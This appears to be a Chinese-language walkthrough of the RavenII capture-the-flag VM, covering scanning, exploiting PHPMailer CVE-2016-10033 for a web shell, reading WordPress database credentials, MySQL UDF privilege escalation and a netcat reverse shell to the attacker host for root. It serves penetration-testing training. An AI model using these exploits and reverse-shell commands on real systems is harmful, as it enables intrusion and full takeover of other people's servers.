一. 网络扫描
┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:3e:92:fb, IPv4: 192.168.10.100
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.10.1 00:50:56:ff:c4:ee VMware, Inc.
192.168.10.2 00:50:56:c0:00:08 VMware, Inc.
192.168.10.11 00:0c:29:bb:da:1b VMware, Inc.
192.168.10.254 00:50:56:e2:68:c6 VMware, Inc.
5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.986 seconds (128.90 hosts/sec). 4 responded
┌──(root㉿kali)-[~]
└─#
┌──(root㉿kali)-[~]
└─# nmap -p- 192.168.10.11
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-01 23:49 EST
Nmap scan report for 192.168.10.11
Host is up (0.00062s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
56088/tcp open unknown
MAC Address: 00:0C:29:BB:DA:1B (VMware)
二、靶机端口扫描
┌──(root㉿kali)-[~]
└─# nmap -p21,80,111,56088 -A 192.168.10.11
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-01 23:50 EST
Stats: 0:00:11 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 23:50 (0:00:06 remaining)
Nmap scan report for 192.168.10.11
Host is up (0.00025s latency).
PORT STATE SERVICE VERSION
21/tcp closed ftp
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-title: Raven Security
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 35577/tcp6 status
| 100024 1 50705/udp status
| 100024 1 54800/udp6 status
|_ 100024 1 56088/tcp status
56088/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:BB:DA:1B (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.25 ms 192.168.10.11
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.11 seconds
三、Web信息收集
┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.10.11
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /root/.dirsearch/reports/192.168.10.11/_23-02-01_23-55-37.txt
Error Log: /root/.dirsearch/logs/errors-23-02-01_23-55-37.log
Target: http://192.168.10.11/
[23:55:37] Starting:
[23:55:37] 301 - 311B - /js -> http://192.168.10.11/js/
[23:55:37] 200 - 18KB - /.DS_Store
[23:55:38] 403 - 299B - /.ht_wsr.txt
[23:55:38] 403 - 302B - /.htaccess.bak1
[23:55:38] 403 - 302B - /.htaccess.orig
[23:55:38] 403 - 304B - /.htaccess.sample
[23:55:38] 403 - 302B - /.htaccess.save
[23:55:38] 403 - 300B - /.htaccess_sc
[23:55:38] 403 - 303B - /.htaccess_extra
[23:55:38] 403 - 300B - /.htaccessBAK
[23:55:38] 403 - 300B - /.htaccessOLD
[23:55:38] 403 - 302B - /.htaccess_orig
[23:55:38] 403 - 301B - /.htaccessOLD2
[23:55:38] 403 - 292B - /.htm
[23:55:38] 403 - 293B - /.html
[23:55:38] 403 - 298B - /.htpasswds
[23:55:38] 403 - 302B - /.htpasswd_test
[23:55:38] 403 - 299B - /.httr-oauth
[23:55:38] 403 - 292B - /.php
[23:55:38] 403 - 293B - /.php3
[23:55:41] 200 - 13KB - /about.html
[23:55:47] 200 - 9KB - /contact.php
[23:55:47] 301 - 312B - /css -> http://192.168.10.11/css/
[23:55:49] 301 - 314B - /fonts -> http://192.168.10.11/fonts/
[23:55:50] 301 - 312B - /img -> http://192.168.10.11/img/
[23:55:50] 200 - 16KB - /index.html
[23:55:51] 200 - 4KB - /js/
[23:55:52] 200 - 626B - /manual/index.html
[23:55:52] 301 - 315B - /manual -> http://192.168.10.11/manual/
[23:55:57] 403 - 301B - /server-status
[23:55:57] 403 - 302B - /server-status/
[23:56:00] 200 - 5KB - /vendor/ 此目录下的PATH,发现flag1
[23:56:02] 200 - 2KB - /wordpress/wp-login.php
[23:56:02] 200 - 51KB - /wordpress/
Task Completed
查看/wordpress界面
界面显示不全,
修改/etc/hosts
添加192.168.10.11 raven.local
修改解析
之后刷新页面,是wordpress的站点
后面再扫描一遍网站目录
──(root㉿kali)-[~]
└─# dirb http://192.168.10.11
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Feb 2 00:05:22 2023
URL_BASE: http://192.168.10.11/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Entering directory: http://192.168.10.11/wordpress/wp-content/ ----
+ http://192.168.10.11/wordpress/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.10.11/wordpress/wp-content/languages/
==> DIRECTORY: http://192.168.10.11/wordpress/wp-content/plugins/
==> DIRECTORY: http://192.168.10.11/wordpress/wp-content/themes/
==> DIRECTORY: http://192.168.10.11/wordpress/wp-content/upgrade/
==> DIRECTORY: http://192.168.10.11/wordpress/wp-content/uploads/ 这里有flag3
flag3
发现flag3
flag3{a0f568aa9de277887f37730d71520d9b}
查看/vendor目录下的PATH,得到路径和第一个flag1
/var/www/html/vendor/
flag1{a2c1f66d2b8051bd3a5874b5b6e43e21}
查看/vendor目录下的SECURITY.md,发现存在的漏洞
PHPMailer versions prior to 5.2.18 (released December 2016) are vulnerable to [CVE-2016-10033]
┌──(root㉿kali)-[~/phpmailer]
└─# searchsploit phpmailer
------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------- ---------------------------------
PHPMailer 1.7 - 'Data()' Remote Denial of Service | php/dos/25752.txt
PHPMailer < 5.2.18 - Remote Code Execution | php/webapps/40968.sh
PHPMailer < 5.2.18 - Remote Code Execution | php/webapps/40970.php
PHPMailer < 5.2.18 - Remote Code Execution | php/webapps/40974.py
PHPMailer < 5.2.19 - Sendmail Argument Injection (Metasploit) | multiple/webapps/41688.rb
PHPMailer < 5.2.20 - Remote Code Execution | php/webapps/40969.py
PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - 'AIO' 'PwnS | php/webapps/40986.py
PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution | php/webapps/42221.py
PHPMailer < 5.2.21 - Local File Disclosure | php/webapps/43056.py
WordPress Plugin PHPMailer 4.6 - Host Header Command Injection (Metasploit) | php/remote/42024.rb
------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(root㉿kali)-[~/phpmailer]
└─# cp /usr/share/exploitdb/exploits/php/webapps/40974.py .
┌──(root㉿kali)-[~/phpmailer]
└─# ls
40974.py
修改区域
修改区域
执行
┌──(root㉿kali)-[~/phpmailer]
└─# python3 ./40974.py
█████╗ ███╗ ██╗ █████╗ ██████╗ ██████╗ ██████╗ ██████╗ ███████╗██████╗
██╔══██╗████╗ ██║██╔══██╗██╔══██╗██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔══██╗
███████║██╔██╗ ██║███████║██████╔╝██║ ██║ ██║██║ ██║█████╗ ██████╔╝
██╔══██║██║╚██╗██║██╔══██║██╔══██╗██║ ██║ ██║██║ ██║██╔══╝ ██╔══██╗
██║ ██║██║ ╚████║██║ ██║██║ ██║╚██████╗╚██████╔╝██████╔╝███████╗██║ ██║
╚═╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝
PHPMailer Exploit CVE 2016-10033 - anarcoder at protonmail.com
Version 1.0 - github.com/anarcoder - greetings opsxcq & David Golunski
[+] SeNdiNG eVIl SHeLL To TaRGeT....
[+] SPaWNiNG eVIL sHeLL..... bOOOOM :D
[+] ExPLoITeD http://192.168.10.11/contact.php
┌──(root㉿kali)-[~/phpmailer]
└─#
开启监听后就可以在浏览器里访问了
┌──(root㉿kali)-[~]
└─# nc -lvnp 4444
listening on [any] 4444 ...
在浏览器访问
在浏览器访问
┌──(root㉿kali)-[~]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.10.100] from (UNKNOWN) [192.168.10.11] 37496
/bin/sh: 0: can't access tty; job control turned off
$
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data
$ uname -a
Linux Raven 3.16.0-6-amd64 #1 SMP Debian 3.16.57-2 (2018-07-14) x86_64 GNU/Linux
$ ps -aux |grep root
先建立可交互式shell
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@Raven:/var/www/html$ pwd
pwd
/var/www/html
www-data@Raven:/var/www/html$ cd wordpress
cd wordpress
www-data@Raven:/var/www/html/wordpress$ ls -al
ls -al
ls -al
total 204
drwxrwxrwx 5 root root 4096 Nov 9 2018 .
drwxrwxrwx 10 root root 4096 Feb 3 01:17 ..
-rw-r--r-- 1 www-data www-data 255 Aug 13 2018 .htaccess
-rwxrwxrwx 1 root root 418 Sep 25 2013 index.php
-rwxrwxrwx 1 root root 19935 Aug 13 2018 license.txt
-rwxrwxrwx 1 root root 7413 Aug 13 2018 readme.html
-rwxrwxrwx 1 root root 5447 Sep 27 2016 wp-activate.php
drwxrwxrwx 9 root root 4096 Jun 15 2017 wp-admin
-rwxrwxrwx 1 root root 364 Dec 19 2015 wp-blog-header.php
-rwxrwxrwx 1 root root 1627 Aug 29 2016 wp-comments-post.php
-rwxrwxrwx 1 root root 2853 Dec 16 2015 wp-config-sample.php
-rw-rw-rw- 1 www-data www-data 3134 Aug 13 2018 wp-config.php
这里有个权限开放给了www-data低权限用户
drwxrwxrwx 7 root root 4096 Feb 3 01:04 wp-content
-rwxrwxrwx 1 root root 3286 May 24 2015 wp-cron.php
drwxrwxrwx 18 root root 12288 Jun 15 2017 wp-includes
-rwxrwxrwx 1 root root 2422 Nov 21 2016 wp-links-opml.php
-rwxrwxrwx 1 root root 3301 Oct 25 2016 wp-load.php
-rwxrwxrwx 1 root root 34337 Aug 13 2018 wp-login.php
-rwxrwxrwx 1 root root 8048 Jan 11 2017 wp-mail.php
-rwxrwxrwx 1 root root 16200 Apr 6 2017 wp-settings.php
-rwxrwxrwx 1 root root 29924 Jan 24 2017 wp-signup.php
-rwxrwxrwx 1 root root 4513 Oct 14 2016 wp-trackback.php
-rwxrwxrwx 1 root root 3065 Aug 31 2016 xmlrpc.php
www-data@Raven:/var/www/html/wordpress$
查看一下
这里竟然有数据库的用户名和数据库的密码
www-data@Raven:/var/www/html/wordpress$ cat wp-config.php
cat wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'root');
这里竟然有数据库的用户名
/** MySQL database password */
define('DB_PASSWORD', 'R@v3nSecurity');
和数据库的密码
/** MySQL hostname */
define('DB_HOST', 'localhost');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8mb4');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
连接数据库
www-data@Raven:/var/www/html/wordpress$ mysql -u root -p
mysql -u root -p
Enter password: R@v3nSecurity
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 37
Server version: 5.5.60-0+deb8u1 (Debian)
Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| wordpress |
+--------------------+
4 rows in set (0.00 sec)
mysql>
通过mysql数据库提权
第一种
\! bash
mysql> \! bash
\! bash
www-data@Raven:/var/www/html/wordpress$
第二种
用UDF用户定义函数来提权,在kali下有可以利用的UDF动态链接库,
其中dll用于window系统,so用于linux系统,
其 sys_64指64位版本
┌──(root㉿kali)-[~/phpmailer]
└─# find / -iname "*mysqludf*" -type f 2>/dev/null
/usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_32.dll
/usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_64.so
/usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_64.dll
/usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_32.so
/usr/share/sqlmap/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_
/usr/share/sqlmap/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_
/usr/share/sqlmap/data/udf/mysql/linux/64/lib_mysqludf_sys.so_
/usr/share/sqlmap/data/udf/mysql/linux/32/lib_mysqludf_sys.so_
复制so文件,并改名为udf.so
┌──(root㉿kali)-[~/phpmailer]
└─# cp /usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_64.so .
┌──(root㉿kali)-[~/phpmailer]
└─# ls
40974.py lib_mysqludf_sys_64.so
┌──(root㉿kali)-[~/phpmailer]
└─# mv lib_mysqludf_sys_64.so udf.so
┌──(root㉿kali)-[~/phpmailer]
└─# ls
40968.sh 40974.py udf.so
把udf.so文件从kali攻击机传至目标靶机的
tmp目录下
www-data@Raven:/var/www/html/wordpress$ cd /tmp
cd /tmp
www-data@Raven:/tmp$
www-data@Raven:/tmp$ nc -nvlp 4444 > udf.so
nc -nvlp 4444 > udf.so
listening on [any] 4444 ...
connect to [192.168.10.11] from (UNKNOWN) [192.168.10.100] 47720
www-data@Raven:/tmp$
切到kali
┌──(root㉿kali)-[~/phpmailer]
└─# nc 192.168.10.11 4444 < udf.so -w 1
靶机
www-data@Raven:/tmp$ ls
ls
abc.txt udf.so
需要把.so文件放至plugin目录/usr/lib/mysql/plugin/
mysql> show variables like '%plugin%';
show variables like '%plugin%';
+---------------+------------------------+
| Variable_name | Value |
+---------------+------------------------+
| plugin_dir | /usr/lib/mysql/plugin/ |
+---------------+------------------------+
1 row in set (0.00 sec)
mysql>
insert into yyf values(load_file('/tmp/udf.so'));
创建一个名为yyf的表格
mysql> create table yyf(line blob);
create table yyf(line blob);
Query OK, 0 rows affected (0.00 sec)
将udf.so文件内容加载到yyf表中
mysql> insert into yyf values(load_file('/tmp/udf.so'));
insert into yyf values(load_file('/tmp/udf.so'));
Query OK, 1 row affected (0.00 sec)
再把内容转载写入到一个插件文件中,名为yyf.so
mysql> select * from yyf into dumpfile '/usr/lib/mysql/plugin/yyf.so';
select * from yyf into dumpfile '/usr/lib/mysql/plugin/yyf.so';
Query OK, 1 row affected (0.00 sec)
调用so文件,创建一个可以调用系统命令的函数
mysql> create function sys_exec returns integer soname 'yyf.so';
create function sys_exec returns integer soname 'yyf.so';
Query OK, 0 rows affected (0.00 sec)
测试sys_exec函数可用
mysql> select sys_exec('id>/tmp/abc.txt');
select sys_exec('id>/tmp/abc.txt');
+-----------------------------+
| sys_exec('id>/tmp/abc.txt') |
+-----------------------------+
| 0 |
+-----------------------------+
1 row in set (0.00 sec)
此时tmp目录已经生产了abc.txt文件,而且为root创建的
www-data@Raven:/tmp$ ls -l
ls -l
total 12
-rw-rw---- 1 root root 39 Feb 3 22:44 abc.txt
-rw-r--r-- 1 www-data www-data 8040 Feb 3 22:33 udf.so
www-data@Raven:/tmp$
执行反弹命令函数
kali
┌──(root㉿kali)-[~]
└─# nc -nvlp 5555
listening on [any] 5555 ...
靶机
mysql> select sys_exec('nc 192.168.10.100 5555 -e /bin/bash');
select sys_exec('nc 192.168.10.100 5555 -e /bin/bash');
切到kali
┌──(root㉿kali)-[~]
└─# nc -nvlp 5555
listening on [any] 5555 ...
connect to [192.168.10.100] from (UNKNOWN) [192.168.10.11] 50015
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
kali那边断开后靶机mysql里会提示以下内容
+-------------------------------------------------+
| sys_exec('nc 192.168.10.100 5555 -e /bin/bash') |
+-------------------------------------------------+
| 0 |
+-------------------------------------------------+
1 row in set (21.27 sec)
之前找到了flag1和flag3,现在找到其它的flag
find / -iname "*flag*" 2>/dev/null
/proc/kpageflags
/proc/sys/kernel/acpi_video_flags
/var/www/html/wordpress/wp-content/uploads/2018/11/flag3.png
/var/www/html/wordpress/wp-includes/images/icon-pointer-flag-2x.png
/var/www/html/wordpress/wp-includes/images/icon-pointer-flag.png
/var/www/flag2.txt
/var/lib/mysql/debian-5.5.flag
/root/flag4.txt
/usr/include/x86_64-linux-gnu/asm/processor-flags.h
/usr/include/x86_64-linux-gnu/bits/waitflags.h
/usr/include/linux/kernel-page-flags.h
/usr/include/linux/tty_flags.h
/usr/lib/x86_64-linux-gnu/perl/5.20.2/bits/waitflags.ph
/usr/share/man/man3/fesetexceptflag.3.gz
/usr/share/man/man3/fegetexceptflag.3.gz
/usr/share/doc/apache2-doc/manual/tr/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/ja/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/ko/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/zh-cn/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/de/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/es/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/da/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/pt-br/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/fr/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/en/rewrite/flags.html
/sys/devices/pci0000:00/0000:00:11.0/0000:02:01.0/net/eth0/flags
/sys/devices/virtual/net/lo/flags
/sys/devices/platform/serial8250/tty/ttyS0/flags
/sys/devices/platform/serial8250/tty/ttyS1/flags
/sys/devices/platform/serial8250/tty/ttyS2/flags
/sys/devices/platform/serial8250/tty/ttyS3/flags
/sys/kernel/debug/tracing/events/power/pm_qos_update_flags
/sys/module/scsi_mod/parameters/default_dev_flags
cat /var/www/flag2.txt
flag2{6a8ed560f0b5358ecf844108048eb337}
cat /root/flag4.txt
___ ___ ___
| _ \__ ___ _____ _ _ |_ _|_ _|
| / _` \ V / -_) ' \ | | | |
|_|_\__,_|\_/\___|_||_|___|___|
flag4{df2bc5e951d91581467bb9a2a8ff4425}
CONGRATULATIONS on successfully rooting RavenII
I hope you enjoyed this second interation of the Raven VM
Hit me up on Twitter and let me know what you thought:
@mccannwj / wjmccann.github.io
OK啦~~~
网友评论